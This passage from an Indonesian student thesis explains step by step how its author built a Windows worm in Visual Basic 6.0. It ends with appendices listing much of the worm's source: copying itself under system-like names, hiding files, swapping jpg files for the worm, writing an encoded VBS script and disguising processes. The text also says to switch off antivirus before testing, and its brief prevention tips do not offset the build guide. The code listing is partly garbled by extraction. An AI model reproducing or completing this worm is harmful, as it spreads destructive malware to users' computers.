menjadi lebih sulit untuk dianalisa dan menyebabkan bertambahnya waktu yang

diperlukan para peniliti virus untuk melakukan proses disassembly (pengubahan kembali kode mesin menjadi kode assembly) dan analisa.

3. Homogenitas Infrastruktur Sistem Komputer

Kesamaan (homogenitas) dalam hal penggunaan hardware, sistem operasi serta aplikasi perangkat lunak dapat menjadi salah satu penyebab utama epidemi dari

virus komputer seperti Worm dan Trojan Horses. Pada saat ini, lebih dari 90% komputer di dunia bekerja dengan sistem operasi Microsoft Windows disertai

dengan perangkat keras (hardware). Sehingga pada dasarnya dapat dikatakan bahwa hampir seluruh PC di dunia memiliki kemiripan, baik dalam hal perangkat lunak maupun keras.

4. Kemudahan Pemrograman

Kemudahan pemrograman dalam sistem operasi Windows telah membuat proses

pembuatan virus komputer menjadi suatu hal yang cukup mudah. 5. Konektivitas Yang Lengkap

Jaringan komputer dewasa ini lebih terhubung satu sama lain dibandingkan

waktu-waktu sebelumnya. Peningkatan jumlah hubungan dalam sistem komunikasi memungkinkan Worm untuk dapat menyebar dengan sangat cepat dan bahkan

menyerang target dengan jumlah yang sangat besar. 6. Migrasi Teknologi Ke Perumahan

Migrasi teknologi PC dari perusahaan ke rumah-rumah dan pengadopsian bentuk

(33)

BAB 3

PERANCANGAN SISTEM

3.1 Gambaran Umum Virus Worm

Dalam bab ini, penulis membahas mengenai seluruh tahapan perancangan virus Worm. Tahapan perancangan ini merupakan tahap awal dalam membangun sebuah

virus Worm, seperti perencanaan sistem, struktur perancangan sistem dan tahap perancangan sistem.

Dalam perancangan Worm ini, penulis memakai bahasa pemrograman Visual Basic 6.0. Alasan penulis memilih bahasa pemrograman Visual Basic versi 6.0 ini

karena merupakan program yang berbasis Windows yang mempunyai kemampuan untuk berinteraksi dengan seluruh aplikasi Windows dan merupakan bahasa pemrograman yang mendukung file scripting object.

3.2 Tahap Perancangan

Tahap perancangan sistem virus Worm ini memerlukan perencanaan yang baik,

percobaan yang berulang-ulang dan perbaikan pada sistem. Sebelum sampai pada pembahasan tahap perancangan sistem, terlebih dahulu akan dibahas mengenai

(34)

3.2.1 Flowchart

Flowchart adalah diagram alur yang berisi bagan-bagan yang menggambarkan langkah-langkah penyelesaian suatu masalah. Flowchart sangat membantu dalam

menggambarkan isi dari sistem yang akan dibangun. Gambar 3.1 di bawah ini adalah flowchart virus Worm yang dibuat oleh penulis.

Gambar 3.1 Flowchart Rancangan Virus Worm

Start

User Input

Form Load

Pengaktifan Virus

File Penggandaan

& Pengaturan

Registry

End Y

(35)

3.2.2 Struktur Perancangan

Struktur perancangan merupakan bagian terpenting yang menggambarkan alur kerja dari sistem yang akan dibangun. Dengan struktur perancangan, penulis dapat

menggambarkan alur kerja dari virus Worm sehingga lebih mudah untuk dipahami. Gambar 3.2 di bawah ini adalah struktur perancangan virus Worm yang dibuat oleh

penulis.

Gambar 3.2 Struktur Diagram Virus Worm

Virus Worm

Form Load

Kode Pengganda

Kopi Ke Windows

Get Files

Infeksi 1 Infeksi 2 Kenal

Module

(36)

3.2.3 Pembuatan Form Load

Setelah program Visual Basic 6.0 berhasil diinstal, tahap selanjutnya adalah memulai merancang Worm dengan memanggil Visual Basic 6.0 yang akan digunakan sebagai

bahasa pemrograman, di mana sesaat kemudian akan tampil jendela program Visual Basic 6.0 bersamaan dengan munculnya kotak dialog New Project. Gambar 3.3 di

bawah ini adalah tampilan jendela program Visual Basic 6.0.

Gambar 3.3 Tampilan Awal Visual Basic 6.0

Pada kotak dialog New Project terdapat tiga pilihan tabulasi. Pilih tabulasi New

dengan mengklik pilihan Standard.EXE kemudian klik tombol Open. Gambar 3.4 di bawah ini adalah tampilan jendela program Visual basic 6.0.

(37)

Tabel 3.1 Pilihan Tabulasi Kotak Dialog New Project

Tabulasi Keterangan

New Untuk membuat proyek baru dengan berbagai macam pilihan. Existing Pilihan untuk membuka daftar nama proyek yang pernah dibuat

sebelumnya.

Recent Pilihan untuk membuka daftar nama proyek yang telah dibuat dan terakhir kali dibuka.

Tabel 3.1 di atas menunjukkan pilihan-pilihan tabulasi yang terdapat pada kotak dialog New Project. Selanjutnya, penulis akan membuat sebuah Form Load

yang menjadi fungsi kerja virus Worm saat pertama kali dijalankan. Sorot Properties, yaitu jendela yang digunakan untuk menampilkan dan mengubah properti-properti yang dimiliki sebuah objek. Kemudian atur BorderStyle menjadi 0-None. Tampilan

dari pengaturan BorderStyle diperlihatkan pada Gambar 3.5 di bawah ini.

Gambar 3.5 Pengaturan BorderStyle

Kemudian buat satu buah objek ListBox pada Form Load Design yang

berfungsi untuk membuat daftar pilihan. Tampilannya diperlihatkan pada Gambar 3.6 di bawah ini.

(38)

Setelah itu, tambahkan satu buah TextBox pada Form Load yang berfungsi

untuk membuat objek teks pada program, di mana teks tersebut dapat diubah sesuai keperluan dan atur letaknya sehingga berada di bawah ListBox. Gambar 3.7 di bawah

ini adalah tampilan penambahan objek TextBox.

Gambar 3.7 Penambahan Objek TextBox

Langkah selanjutnya tambahkan 4 (empat) buah Timer pada Form Load

Design dan atur letaknya sehingga berada di samping ListBox dan TextBox yang

telah dibuat. Timer disini berfungsi untuk membuat kontrol waktu dengan interval yang ditentukan. Gambar 3.8 di bawah ini adalah tampilan dari penambahan objek

Timer.

(39)

Tabel 3.2 di bawah ini menunjukkan beberapa objek properties yang dibutuhkan

dalam Form Load Design.

Tabel 3.2 Objek Properties

Objek Jumlah Keterangan

ListBox 1 Membuat daftar pilihan

TextBox 1 Membuat objek teks pada program

Timer 4 Membuat kontrol waktu dengan interval yang ditentukan

3.2.4 Pembuatan Kode Program Pada Form Load

Setelah Form Load berhasil dibuat, selanjutnya adalah pengisian kode program ke

dalam Form Load tersebut dengan tujuan agar Form Load dapat melakukan fungsinya. Gambar 3.9 di bawah ini adalah tampilan dari kode Form Load yang telah

dimasukkan ke dalam Form Load Design.

(40)

3.2.5 Pembuatan Modul

Selain pembuatan Form Load, penulis juga menambahkan tujuh buah modul yang berguna sebagai tempat bantuan untuk pembuatan fungsi kerja virus Worm. Masing-masing modul memiliki keterkaitan antara satu sama lain dan berhubungan langsung

dengan Form Load. Tampilannya diperlihatkan pada Gambar 3.10 di bawah ini.

Gambar 3.10 Modul 1

3.2.6 Penentuan Tampilan Infeksi Worm

Setelah ke tujuh buah modul dibuat, tahap selanjutnya adalah menentukan tampilan infeksi dari virus Worm. Pada tahap ini, penulis hanya akan membuat 4 (empat) buah tampilan infeksi karena mengingat keterbatasan pengetahuan yang dimiliki oleh

penulis. Tabel 3.3 di bawah ini adalah beberapa tampilan infeksi Worm.

Tabel 3.3 Tampilan Infeksi Worm

Tampilan Keterangan

Jenis tampilan infeksi ini adalah jenis dokumen file dan berekstensi *.Doc pada program

Jenis tampilan infeksi ini adalah jenis folder dan berekstensi *.* pada program

Jenis tampilan infeksi ini adalah jenis gambar (walpaper) dan berekstensi *.jpg pada program

(41)

BAB 4

IMPLEMENTASI SISTEM

4.1 Implementasi Sistem

Implementasi sistem merupakan prosedur yang dilakukan untuk menyelesaikan desain sistem yang ada dalam dokumen desain yang disetujui, menguji sistem, menginstal, dan memulai sistem baru yang telah diperbaiki. Pada tahap implementasi sistem ini,

penulis hanya melakukan tahap pembuatan sistem, penyelesaian desain sistem, menguji sistem dan perbaikan sistem.

4.2 Komponen Utama Dalam Implementasi Sistem

Untuk melakukan tahap implementasi sistem dan pengolahan data, di sini penulis menggunakan komputer sebagai media utama dalam pengujian sistem, di mana

komputer tersebut haruslah mempunyai 3 (tiga) komponen utama, yaitu: 1. Hardware

Hardware (perangkat keras) adalah komponen yang bekerja sama di dalam

melaksanakan pengolahan data yang terdiri dari: a. Monitor super VGA

b. CPU (Central Proccesing Unit)

c. Harddisk, sesuai dengan kapasitas yang dibutuhkan.

(42)

2. Software

Software (perangkat lunak) merupakan sistem prosedur dalam bentuk yang dapat

digunakan komputer dan memberikan fungsi serta menampilkan yang diinginkan.

Software yang diperlukan untuk menjelaskan hardware untuk aplikasi pembuatan virus adalah Microsoft Visual Basic 6.0.

3. Brainware

Brainware (manusia) merupakan faktor manusia yang menangani fasilitas

komputer dengan beberapa kriteria berikut :

a. Sistem Analis: orang yang membentuk dan membangun fasilitas rancangan sistem desain.

b. Programmer: orang yang mengerti bahasa pemrograman dalam membuat dan

membangun program.

c. Operator Komputer: orang yang mengenal langsung dalam pengolahan

program dan mulai mempersiapkan sampai dengan tampilan pengentrian data ke dalam komputer.

4.3 Tujuan Implementasi Sistem

Berikut adalah beberapa tujuan dari implementasi sistem: a. Membuat desain sistem selama penelitian.

b. Menyelesaikan desain sistem yang telah disetujui.

c. Memperhitungkan sistem yang telah dibuat sesuai kebutuhan.

(43)

4.4 Tahap Implementasi Sistem

Dalam tahap implementasi sistem, penulis hanya akan membahas mengenai cara kerja virus Worm, hasil infeksi dan cara penanggulangannya.

4.4.1 Cara Kerja Virus Worm

Pada bab sebelumnya, penulis telah menjelaskan cara kerja virus Worm dengan

menggunakan flowchart, seperti yang terlihat pada Gambar 3.1. Di sini penulis hanya akan membahas mulai dari fungsi-fungsi dalam Form Load hingga bagian-bagian yang diserang oleh Worm.

4.4.1.1 Fungsi-fungsi Dalam Form Load

Berikut ini adalah beberapa fungsi yang terdapat dalam Form Load.

a. Fungsi Kode Pengganda

Adalah fungsi penggandaan ke setiap folder.

b. Fungsi Kopi ke Windows

Adalah fungsi kopi ke folder-folder Windows yang ada di C.

c. Fungsi Get Files

Adalah fungsi yang bertujuan menyembunyikan gambar (picture) yang berekstensi jpg lalu diganti dengan Worm

d. Fungsi Infeksi 1

Adalah fungsi yang bertujuan untuk menyerang bagian regedit, di mana setiap

(44)

e. Fungsi Infeksi 2

Adalah fungsi penggandaan file yang tanpa diketahui (pengkopian file) ke Windows.

f. Fungsi Kenal

Adalah fungsi yang bertujuan menyerang file yang berekstensi exe, seperti

software.

4.4.1.2 Melakukan Penggandaan Ke Sistem

Proses penggandaan ke sistem berfungsi agar virus Worm tetap aktif pada saat komputer restart. Biasanya hasil penggandaan ke sistem mempunyai nama yang

hampir sama dengan nama file system dan ada juga yang sama persis dengan nama file

system, hanya saja lokasi file tersebut berada dengan file aslinya atau pada lokasi yang

sama dan terjadi sedikit perbedaan sehingga file tersebut hampir tidak diketahui perbedaannya (contoh winlogon.exe, services.exe, system.exe, dan lain-lain).

Ketika virus dijalankan, virus tersebut akan mulai melakukan aktivitasnya dengan melakukan penggandaan ke sistem komputer. Hal ini dilakukan agar virus

tetap berada pada sistem meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang terkopi di sistem yang benar-benar telah terinfeksi virus. Lokasi folder penggandaan virus pada sistem

biasanya meliputi windows atau winnt, system32, startup, application data. Lokasi ini biasanya paling sering digunakan karena menurut orang awam file pada lokasi ini

(45)

Selain lokasi folder, virus juga melakukan perubahan extention untuk

menyamar agar sulit dicari. Extention file yang sering digunakan pada saat melakukan penggandaan pada sistem adalah exe, scr, com dan pif.extention. Semua Extention file

tersebut memiliki cara akses yang sama. Meskipun terjadi perubahan extention, tetapi akan terlihat berjalan dengan normal. Agar penyamaran sukses, virus sering menggunakan penamaan yang hampir sama dengan file system atau bahkan memang

sama, hanya saja lokasi file yang berbeda, dengan tujuan membuat bingung karena sulit membedakan antara file system yang asli dengan yang palsu (virus). Penamaan

file dengan winlogon.exe, services.exe, system.exe akan dilindungi oleh task manager

sehingga tidak dapat dimatikan prosesnya oleh task manager.

4.4.1.3 Melakukan Pengaturan Registry

Virus yang berjalan pada sistem operasi Windows tidak dapat lepas dari bantuan registry yang dapat membuat virus tersebut mampu memiliki daya tahan kuat sehingga sulit sekali untuk dimusnahkan. Registry dimanfaatkan virus sebagai suatu

tameng atau benteng pertahanan yang dapat melindunginya dari berbagai serangan-serangan yang dapat membuat dirinya musnah dari komputer yang telah terinfeksi.

Misalkan, pembersihan virus berhasil dilakukan dengan mematikan virus menggunakan program task manager ataupun program sejenisnya tanpa melakukan

pembersihan pada registry, di mana virus telah memasang suatu kunci pada registry yang akan digunakan, tidak sedikit virus yang hanya memerlukan suatu fungsi untuk

(46)

4.4.1.4 Melakukan Pengaktifan Virus Pada Sistem

Jika virus telah melakukan penggandaan di sistem komputer, maka virus tersebut akan mengaktifkan hasil penggandaannya yang telah berada di sistem, sehingga meskipun

flashdisk atau media penyimpanan lain yang digunakan sebagai suatu sarana

penyebaran virus tersebut dilepas, maka virus akan tetap aktif. Untuk melakukan pengaktifan virus pada sistem komputer, virus tersebut hanya melakukan suatu

perintah untuk menjalankan virus yang berbeda pada sistem komputer dengan perintah

hell atau ShellExecute.

4.4.2 Teknik Penyebaran

Ada banyak teknik penyebaran yang dilakukan oleh virus, berikut adalah beberapa teknik penyebaran yang biasa dilakukan oleh virus terhadap sistem.

a. Membaca Address Bar pada Windows Explorer

Teknik ini sangat baik selain proses penyebaran sangat cepat juga tidak memerlukan suatu teknik pencarian file. Hal itu dikarenakan user telah memberikan informasi

lokasi file yang dianggap penting dengan cara membuka folder tersebut menggunakan Windows Explorer yang selanjutnya digunakan user untuk menjalankan file. Virus yang mendapatkan lokasi yang dimaksud langsung menggandakan diri ke dalamnya.

Biasanya penamaan file dari hasil penggandaan virus diambil dari nama subfolder yang sedang terbuka.

b. Membaca Folder dan Sub Folder pada Drive Harddisk

(47)

partisi sistem saja dapat menghasilkan ribuan, apalagi user tersebut menggunakan

Multi Operation System dikomputernya, akan mengakibatkan kerusakan sistem lebih

parah lagi.

4.4.3 Rekayasa Teknik Penyebaran

Setelah virus tersebut melakukan penggandaan ke sistem, mengubah registry, barulah

virus tersebut melakukan penyebaran dan perusakan. Serangan virus ini yang sangat ditakuti oleh para pengguna komputer.

4.4.4 Hasil Infeksi Virus Worm

Gambar 4.1 di bawah ini adalah tampilan Form Load Design setelah pembuatan

Form Load, memasukkan kode program ke dalam Form Load, pembuatan tujuh

buah modul dan memasukkan kode program pendukung ke dalam setiap modul.

Gambar 4.1 Tampilan Form Load Design

Tampak dari tampilan Form Load Design bahwa ada beberapa objek-objek

Properties yang digunakan untuk mendukung perancangannya, antara lain: 1 (satu)

buah ListBox, 1 (satu) buah TextBox dan 4 (empat) buah Timer, di mana

(48)

4.4.5 Tampilan Infeksi Virus Worm

Gambar 4.2 di bawah ini adalah salah satu contoh dari tampilan infeksi virus Worm yang telah penulis coba (uji program) sebelumnya untuk melihat hasil infeksi dari virus Worm dan membuktikan berhasil atau tidaknya virus Worm ini dapat bekerja

pada Windows sebagaimana tujuan awal dari pembuatanvirus Worm ini.

Gambar 4.2 Salah Satu Tampilan Worm Setelah Dijalankan

Untuk membuktikan hal di atas yang pertama kali harus dilakukan adalah menonaktifkan Antivirus yang ada pada komputer agar virus yang dijalankan tidak

langsung terdeteksi oleh Antivirus sehingga lebih mudah dalam menemukan hasil infeksi virus Worm yang dicari.

(49)

Setelah itu pada jendela Project 1 Microsoft Visual Basic Design klik Tool Bar

Run atau tekan F5 untuk menjalankan virus Worm, maka akan diperoleh hasil seperti pada Gambar 4.2 sebelumnya. Hasil atau tampilan infeksi virus tergantung pada icon

yang digunakan sebagai hasil pada program.

Hasil atau tampilan dari infeksi virus ini dapat diganti sesuai keinginan,

dengan cara mengubah kode program atau nama dari tampilan yang ada pada Form, yaitu mengganti objek Properties pada Form Load Design, di mana objek yang

diganti adalah icon. Pilih gambar atau icon dengan cara mengklik objek icon pada

Properties kemudian akan munsul jendela Load Icon. Pada jendela tersebut browse

atau carilah gambar (icon) yang diinginkan. Setelah itu sorot File pada Tool Bar

Windows kemudian pilih dan klik Make nama icon.exe seperti yang terlihat pada Gambar 4.3 di bawah ini.

.

(50)

4.5 Cara Penanggulangan

Untuk menanggulangi serangan virus, baik itu Worm atau jenis virus lainnya, berikut dibahas mengenai cara-cara menanggulanginya sebelum terinfeksi dan setelah

terinfeksi. Akan tetapi perlu diketahui bahwa virus Worm ini masih memiliki kelemahan antara lain, yaitu masih mudah terdeteksi oleh Antivirus, khususnya

Antivirus yang selalu diupdate rutin oleh user.

4.5.1 Sebelum Terinfeksi

Berikut adalah beberapa langkah-langkah yang dapat dilakukan untuk pencegahan

sebelum komputer atau bagian-bagian dari komputer terinfeksi:

a. Gunakan Antivirus yang dipercaya dengan update terbaru. Apapun merk dari

Antivirus yang dimiliki asalkan selalu diupdate secara rutin dan selalu menyalakan

Autoprotec.

b. Selalu memindai (scan) semua media penyimpanan eksternal yang akan digunakan,

misalnya penggunaan flashdisk, flashdrive dan lain-lain. Hal ini memang agak merepotkan tetapi jika Autoprotec Antivirus yang digunakan ada dan bekerja maka

langkah ke dua ini dapat dilewatkan.

(51)

4.5.2 Setelah Terinfeksi

Berikut adalah beberapa langkah yang dapat dilakukan pada saat komputer atau bagian-bagian dari komputer telah terinfeksi:

a. Deteksi dan tentukan dimana letak sumber virus tersebut dan ada baiknya melepas atau menonaktifkan jaringan yang terhubung dengan komputer terlebih dahulu.

b. Identifikasi dan klasifikasikan jenis virus apa yang menyerang PC, dengan cara: 1. Gejala yang timbul, misal: pesan, file yang corrupt (rusak), file yang hilang. 2. Pindai (scan) dengan Antivirus. Saat Autoprotect ada dan berjalan tetapi virus

tetap berhasil masuk, itu artinya virus definition pada komputer tidak memiliki data virusnya. Hal yang dapat dilakukan selanjutnya adalah melakukan update

secara manual atau mendownload virus definitionnya untuk diinstal. Jika virus tersebut memblok usaha untuk mengupdatenya, maka upayakan untuk menggunakan media lain, seperti komputer dengan Antivirus update terbaru.

c. Jika Antivirus telah diupdate dan tidak berhasil memusnahkannya, maka bersihkan, setelah berhasil mendeteksi dan mengenalinya, usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang

memberikan informasi perkembangan virus.

d. Jika semua hal di atas tidak berhasil, cara terakhir adalah dengan memformat

(52)

BAB 5

KESIMPULAN DAN SARAN

5.1 Kesimpulan

Dalam penulisan Tugas Akhir ini, penulis telah menguraikan mengenai perancangan sistem pembuatan virus Worm. Sehingga, penulis dapat membuat kesimpulan:

1. Virus Worm dapat dibuat dengan menggunakan bahasa pemrograman Visual Basic.

2. Cara kerja virus Worm yang dibuat adalah melakukan fungsi-fungsi pada Form Load, penggandaan ke sistem, mengubah pengaturan Registry dan merusak sistem

pada Windows.

3. Virus Worm ini masih memiliki kelemahan, yaitu masih mudah terdeteksi oleh Antivirus, khususnya Antivirus yang selalu diupdate rutin oleh user.

5.2 Saran

Pada tahap ini, penulis mencoba memberikan saran yang kiranya dapat bermanfaat

bagi pihak pembaca, yaitu:

1. Agar semua kalangan dapat lebih berhati-hati dalam menggunakan software ataupun hardware sebagai media penyimpanan.

2. Sebaiknya setiap pengguna komputer (user) dapat mengetahui cara kerja dari virus yang menyerang sistem komputernya, sehingga lebih mudah dalam

(53)

DAFTAR PUSTAKA

Panduan Tata Cara Penulisan Skripsi dan Tugas Akhir. 2005. Dokumen Nomor:

Akad/05/2005. Medan: Fakultas Matematika dan Ilmu Pengetahuan Alam

Universitas Sumatera Utara.

Hendrayudi. 2008. Visual Basic Untuk Berbagai Keperluan Pemrograman.

Yogyakarta, Indonesia: Elex Media Komputindo.

Yuswanto. 2001. Panduan Belajar Microsoft Visual Basic 6.0 Untuk Pemrograman

Multiuser. Jakarta: Prestasi Pustaka.

Amperiyanto, Tri. 2010. Kitab Sakti Virus File. Jakarta: PT. Elex Media Komputindo. Cyber, Team. 2009. Membuat & Membasmi Virus Komputer. Jakarta: HP Cyber

Community.

http://www.ilmukomputer.com/

http://www.google.com/ Diakses bulan Januari-Februari 2010

(54)

Listing Program Virus Worm

Lampiran 1

Form Load

Option Explicit

Private Const FILE_ATTRIBUTE_READONLY = &H1 Private Const FILE_ATTRIBUTE_HIDDEN = &H2 Private Const FILE_ATTRIBUTE_SYSTEM = &H4 Private Const FILE_ATTRIBUTE_DIRECTORY = &H10 Private Const FILE_ATTRIBUTE_ARCHIVE = &H20 Private Const FILE_ATTRIBUTE_NORMAL = &H80 Private Const FILE_ATTRIBUTE_TEMPORARY = &H100 Private Const FILE_ATTRIBUTE_COMPRESSED = &H800 Private Const MAX_PATH = 260

Private Type FILETIME

Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" _

(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" _

(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _ (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private pbMessage As Boolean

(55)

Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpexitCode As Long) As Long

Private iResult As Long Private hProg As Long Private id As Long Private iExit As Long

Const STILL_ACTIVE As Long = &H103

Const PROCESS_ALL_ACCESS As Long = &H1F0FF Dim induk As String

Dim lokasi As String Dim lokasi2 As String Dim lokasi3 As String Dim lokasi4 As String Dim lokasi5 As String Dim i As Integer Dim bool As Boolean

Private Function DriveType(Drive As String) As String Dim sAns As String, lAns As Long

(56)

Next

End Sub

Private Sub kopikewindows() Dim buffer As String * 255 Dim x As Long

x = GetWindowsDirectory(buffer, 255) On Error Resume Next

FileCopy App.Path & "\" & App.EXEName & ".exe", Left(buffer, x) & "\Walpaper.exe"

SetAttr x, vbHidden + vbSystem End Sub

GetWindowsVersion bool Timer1.Enabled = True App.EXEName = "Fuckme" Then

Timer2.Enabled = True

regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE) End If

App.TaskVisible = False Form1.Hide

If App.EXEName = "XxXLove" Then Open GetSpecialfolder(&H25) & "\msvbvm60.dll" For Input As 1

End Sub

Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")

Screen.MousePointer = vbHourglass

Dim WFD As WIN32_FIND_DATA

(57)

fPath = AddBackslash(Path)

FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then CopyFile "c:\windows\Walpaper.exe", fPath &

StripNulls(WFD.cFileName) & ".exe", 1 End If

If hFile > 0 Then

While FindNextFile(hFile, WFD)

If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then

CopyFile "c:\windows\Walpaper.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1

End If

FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _ StripNulls(WFD.cFileName) <> "." And

StripNulls(WFD.cFileName) <> ".." Then StripNulls(WFD.cFileName) <> ".." Then

Screen.MousePointer = vbHidden

End Sub

Private Function StripNulls(f As String) As String

(58)

End Function

Private Function AddBackslash(S As String) As String

If Len(S) Then Call GetFiles("c:", True, "*.jpg") Call Ricek

Call infeksi1 Call infeksi2 Call kodepengganda End If

If App.EXEName <> "MakeLove" Then Exit Sub If Minute(Now) = 30 And Second(Now) = 30 Then "Print Epson", "C:\Documents and Setting\Temporary\Epson"

End If

cek = AmbilString(HKLM, "Software\lutil\FMR", "svchost") If cek = "" Then

(59)

End If On Error Resume Next Dim tmp As String Dim isi As String

lokasi = GetSpecialfolder(&H27) & "\XxXLove.exe" If Dir$(lokasi, vbSystem) = "" Then

CopyFile induk, lokasi, True SetAttr lokasi, vbHidden Else

If FileLen(induk) <> FileLen(lokasi) Then CopyFile induk, lokasi, True

SetAttr lokasi, vbHidden End If

End If

lokasi2 = GetSpecialfolder(&H1C) & "\MakeLove.exe" If Dir$(lokasi2, vbSystem) = "" Then

CopyFile induk, lokasi2, True SetAttr lokasi2, vbHidden Else

If FileLen(induk) <> FileLen(lokasi2) Then CopyFile induk, lokasi2, True

SetAttr lokasi2, vbHidden End If

End If

lokasi3 = GetSpecialfolder(&H7) & "\Babi.com" If Dir$(lokasi3, vbSystem) = "" Then

CopyFile induk, lokasi3, True SetAttr lokasi3, vbHidden Else

If FileLen(induk) <> FileLen(lokasi3) Then CopyFile induk, lokasi3, True

SetAttr lokasi3, vbHidden End If

End If

If Dir$(GetSpecialfolder(&H7) & "\Semut.vbs", vbHidden) = "" Then Gigit

Else

Open GetSpecialfolder(&H7) & "\Semut.vbs" For Input As 2 Input #2, isi

(60)

If Dir$(lokasi4, vbArchive) = "" Then CopyFile induk, lokasi4, True

SetAttr lokasi4, vbNormal Else

If FileLen(induk) <> FileLen(lokasi4) Then CopyFile induk, lokasi4, True

SetAttr lokasi4, vbNormal End If

End If

tmp = GetSpecialfolder(&H25) & "\msvbvm60.dll" lokasi5 = GetSpecialfolder(&H1A) & "\sys.dll" If Dir$(lokasi5, vbArchive) = "" Then

CopyFile tmp, lokasi5, True SetAttr lokasi5, vbNormal Else

If FileLen(lokasi5) <> 1386496 Then CopyFile tmp, lokasi5, False

SetAttr lokasi5, vbNormal On Error Resume Next Dim i As Integer Dim ada1 As Integer Dim ada2 As Integer Dim ada3 As Integer Dim a1 As Long

If List1.List(i) = "MakeLove.exe" Then ada1 = ada1 + 1

End If

If List1.List(i) = "XxXLove.exe" Then ada1 = ada2 + 1

End If

If List1.List(i) = "Fuckme.com" Then ada1 = ada3 + 1

End If Next Else

For i = 0 To List1.ListCount - 1 If List1.List(i) = lokasi Then ada1 = ada1 + 1

End If

(61)

End If

If List1.List(i) = lokasi3 Then ada2 = ada3 + 1

If App.EXEName <> "MakeLove" And App.EXEName <> "XxXLove" And App.EXEName <> "Fuckme" Then End

End Sub

Public Sub Timer2_Timer() Timer2.Enabled = False

If App.EXEName = "MakeLove" Then Penyamaran "XxXLove.exe", "svchost.exe"

If App.EXEName = "XxXLove" Then Penyamaran "MakeLove.exe", "csrss.exe" "Scripting.FileSystemObject" & Chr(34) & "):"

tmp = tmp + "Set filex = Wscript.CreateObject(" & Chr(34) & "Wscript.Shell" & Chr(34) & "):"

tmp = tmp + "Set Induk1 = fso.GetFile(" & Chr(34) & lokasi4 & Chr(34) & "):"

tmp = tmp + "Set Induk2 = fso.GetFile(" & Chr(34) & lokasi3 & Chr(34) & "):"

tmp = tmp + "if fso.FileExists(" & Chr(34) &

GetSpecialfolder(&H25) & "\msvbvm60.dll" & Chr(34) & ")= False then:" tmp = tmp + "Induk1.Copy(" & Chr(34) & GetSpecialfolder(&H25) & "\msvbvm60.dll" & Chr(34) & "):"

tmp = tmp + "End if:"

tmp = tmp + "if fso.FileExists(" & Chr(34) & lokasi2 & Chr(34) & ")= False then:"

Open GetSpecialfolder(&H7) & "\Semut.vbs" For Output As 2 Print #2, "Rem Encode"

(62)

Print #2, "Function Rubah(data):For i = 1 To Len(data):Rubah = Rubah & Chr(Asc(Mid(data, i, 1)) + 2):Next:End Function"

Close #2

SetAttr GetSpecialfolder(&H7) & "\Semut.vbs", vbArchive End Sub

Private Function Rubah(data As String) As String For i = 1 To Len(data)

Rubah = Rubah & Chr(Asc(Mid(data, i, 1)) - 2) Next

End Function

Private Sub kenal() Dim virpath As String virpath = App.Path

If Right(App.Path, 1) <> "\" Then virpath = virpath & "\"

End If

induk = virpath & App.EXEName & ".exe" End Sub

Private Sub Timer5_Timer() On Error Resume Next

(63)

Lampiran 2

Module 1

Option Explicit

Public buffer As String * 255 Public x As Long

Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Sub Log(strLog As String) Dim ff As Integer

ff = FreeFile

x = GetWindowsDirectory(buffer, 255)

On Error Resume Next 'MkDir App.Path & "\Logs"

Open Left(buffer, x) & "\help.htm" For Output As #ff Print #ff, strLog

Const TH32CS_SNAPALL = (&H1 Or &H2 Or &H4 Or &H8) Const TH32CS_SNAPPROCESS As Long = 2&

Private Type PROCESSENTRY32

th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long

szExeFile As String * 260 End Type

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

(64)

Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long

Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long

Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private myHandle As Long Private myproclist$

Private Function UNICODE(data As String) As String Dim tmp As String

Private Function InitProcHack(pid As Long) As Boolean Dim pHandle As Long

pHandle = OpenProcess(&H1F0FFF, False, pid) If (pHandle = 0) Then

(65)

Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, ' find next position

Wend

Private Function Perbaikan(scr As String, rep As String) Dim i As Integer

Public Sub Penyamaran(Asal As String, Baru As String) Dim newproclist$

Dim myProcess As PROCESSENTRY32 Dim mySnapshot As Long

newproclist$ = ""

myProcess.dwSize = Len(myProcess)

mySnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

Process32First mySnapshot, myProcess

If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then

(66)

